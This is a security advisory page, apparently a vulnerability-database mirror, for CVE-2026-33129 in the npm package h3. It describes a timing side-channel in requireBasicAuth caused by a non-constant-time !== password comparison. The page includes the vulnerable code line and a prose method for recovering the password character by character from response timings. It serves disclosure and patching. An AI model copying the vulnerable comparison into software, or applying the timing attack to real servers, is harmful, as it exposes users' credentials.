GHSA-26F5-8H2X-34XH

Vulnerability from github – Published: 2026-03-18 16:17 – Updated: 2026-03-20 21:27
VLAI?
Summary
h3 has an observable timing discrepancy in basic auth utils
Details

Summary

A Timing Side-Channel vulnerability exists in the requireBasicAuth function due to the use of unsafe string comparison (!==). This allows an attacker to deduce the valid password character-by-character by measuring the server's response time, effectively bypassing password complexity protections.

Details

The vulnerability is located in the requireBasicAuth function. The code performs a standard string comparison between the user-provided password and the expected password:

if (opts.password && password !== opts.password) {
  throw autheFailed(event, opts?.realm);
}

In V8 (and most runtime environments), the !== operator is optimized to "fail fast." It stops execution and returns false as soon as it encounters the first mismatched byte. * If the first character is wrong, it returns immediately. * If the first character is correct but the second is wrong, it takes slightly longer.

By statistically analyzing these minute timing differences over many requests, an attacker can determine the correct password one character at a time.

PoC

This vulnerability is exploitable in real-world scenarios without direct access to the server machine.

To reproduce this, an attacker can send two packets (or bursts of packets) at the exact same time: 1. Packet A: Contains a password that is known to be incorrect starting at the first character (e.g., AAAA...). 2. Packet B: Contains a password where the first character is a guess (e.g., B...).

By measuring the time-to-first-byte (TTFB) or total response time of these concurrent requests, the attacker can filter out network jitter. If Packet B takes consistently longer to return than Packet A, the first character is confirmed as correct. This process is repeated for the second character, and so on. Tests confirm this timing difference is statistically consistent enough to recover credentials remotely.

Impact

This vulnerability allows remote attackers to recover passwords. While network jitter makes this difficult over the internet, it is highly effective in local networks or cloud environments where the attacker is co-located. It reduces the complexity of cracking a password from exponential (guessing the whole string) to linear (guessing one char at a time).

Severity ?
5.9 (Medium)
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.0-rc.8"
      },
      "package": {
        "ecosystem": "npm",
        "name": "h3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-beta.0"
            },
            {
              "fixed": "2.0.1-rc.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33129"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:17:58Z",
    "nvd_published_at": "2026-03-20T10:16:19Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA Timing Side-Channel vulnerability exists in the `requireBasicAuth` function due to the use of unsafe string comparison (`!==`). This allows an attacker to deduce the valid password character-by-character by measuring the server\u0027s response time, effectively bypassing password complexity protections.\n\n### Details\nThe vulnerability is located in the `requireBasicAuth` function. The code performs a standard string comparison between the user-provided password and the expected password:\n\n~~~typescript\nif (opts.password \u0026\u0026 password !== opts.password) {\n  throw autheFailed(event, opts?.realm);\n}\n~~~\n\nIn V8 (and most runtime environments), the `!==` operator is optimized to \"fail fast.\" It stops execution and returns `false` as soon as it encounters the first mismatched byte.\n* If the first character is wrong, it returns immediately.\n* If the first character is correct but the second is wrong, it takes slightly longer.\n\nBy statistically analyzing these minute timing differences over many requests, an attacker can determine the correct password one character at a time.\n\n### PoC\nThis vulnerability is exploitable in real-world scenarios without direct access to the server machine.\n\nTo reproduce this, an attacker can send two packets (or bursts of packets) at the exact same time:\n1.  **Packet A:** Contains a password that is known to be incorrect starting at the first character (e.g., `AAAA...`).\n2.  **Packet B:** Contains a password where the first character is a guess (e.g., `B...`).\n\nBy measuring the time-to-first-byte (TTFB) or total response time of these concurrent requests, the attacker can filter out network jitter. If Packet B takes consistently longer to return than Packet A, the first character is confirmed as correct. This process is repeated for the second character, and so on. Tests confirm this timing difference is statistically consistent enough to recover credentials remotely.\n\n### Impact\n\nThis vulnerability allows remote attackers to recover passwords. While network jitter makes this difficult over the internet, it is highly effective in local networks or cloud environments where the attacker is co-located. It reduces the complexity of cracking a password from exponential (guessing the whole string) to linear (guessing one char at a time).",
  "id": "GHSA-26f5-8h2x-34xh",
  "modified": "2026-03-20T21:27:48Z",
  "published": "2026-03-18T16:17:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/h3js/h3/security/advisories/GHSA-26f5-8h2x-34xh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33129"
    },
    {
      "type": "WEB",
      "url": "https://github.com/h3js/h3/pull/1283"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/h3js/h3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/h3js/h3/releases/tag/v2.0.1-rc.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "h3 has an observable timing discrepancy in basic auth utils"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.